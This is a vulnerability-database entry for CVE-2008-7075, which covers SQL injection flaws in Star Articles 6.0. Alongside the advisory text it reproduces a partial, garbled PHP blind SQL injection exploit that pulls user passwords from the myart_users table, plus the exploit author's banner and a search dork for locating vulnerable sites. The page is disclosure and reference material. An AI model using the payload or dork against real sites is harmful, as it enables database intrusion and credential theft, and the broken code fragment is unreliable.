CVE-2008-7075
published 2009-08-25CVE-2008-7075: Multiple SQL injection vulnerabilities in Kalptaru Infotech Ltd. Star Articles 6.0 allow remote attackers to inject arbitrary SQL commands via (1) the subcatid…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.03%
78.6th percentile
Multiple SQL injection vulnerabilities in Kalptaru Infotech Ltd. Star Articles 6.0 allow remote attackers to inject arbitrary SQL commands via (1) the subcatid parameter to article.list.php; or the artid parameter to (2) article.print.php, (3) article.comments.php, (4) article.publisher.php, or (5) article.download.php; and (6) the PATH_INFO to article.download.php. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kalptaru_infotech | stararticles | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Star Articles 6.0 - Blind SQL Injection (2)
exploitdb·2008-11-27
CVE-2008-7075 Star Articles 6.0 - Blind SQL Injection (2)
Star Articles 6.0 - Blind SQL Injection (2)
---
1) {
$url = $argv[1];
if ($argc $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+myart_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1).""));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
} else {
echo "\nExploiting failed: By Stack\n";
}
?>
# milw0rm.com [2008-11-27]
Exploit-DB
Star Articles 6.0 - Blind SQL Injection (1)
exploitdb·2008-11-26
CVE-2008-7075 Star Articles 6.0 - Blind SQL Injection (1)
Star Articles 6.0 - Blind SQL Injection (1)
---
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ stararticles blind sql injection Vulnerability +
+ +
+ Discovered by b3hz4d +
+ +
+ WwW.DeltaHacking.Net +
+ +
+ +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
APA Center of Yazd University
(https://www.ircert.cc)
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE : 26 nov 2008
SITE : WwW.DeltaHacking.Net
CONTACT: [email protected]
#####################################################
APPLICATION : stararticles
DOWNLOAD(175$): http://cmsnx.com/psf/order.php?id=5
VENDOR : http://www.stararticles.com/
DEMO : http://www.kalptarudemos.com/demo/stararticle/
DORK : inurl:"article.download.php"
########################################
No writeups or analysis indexed.
http://osvdb.org/50452http://osvdb.org/50453http://osvdb.org/50454http://osvdb.org/50455http://osvdb.org/50456http://secunia.com/advisories/32887http://www.securityfocus.com/bid/32489http://www.vupen.com/english/advisories/2008/3269https://exchange.xforce.ibmcloud.com/vulnerabilities/46981https://www.exploit-db.com/exploits/7240https://www.exploit-db.com/exploits/7243http://osvdb.org/50452http://osvdb.org/50453http://osvdb.org/50454http://osvdb.org/50455http://osvdb.org/50456http://secunia.com/advisories/32887http://www.securityfocus.com/bid/32489http://www.vupen.com/english/advisories/2008/3269https://exchange.xforce.ibmcloud.com/vulnerabilities/46981https://www.exploit-db.com/exploits/7240https://www.exploit-db.com/exploits/7243
2009-08-25
Published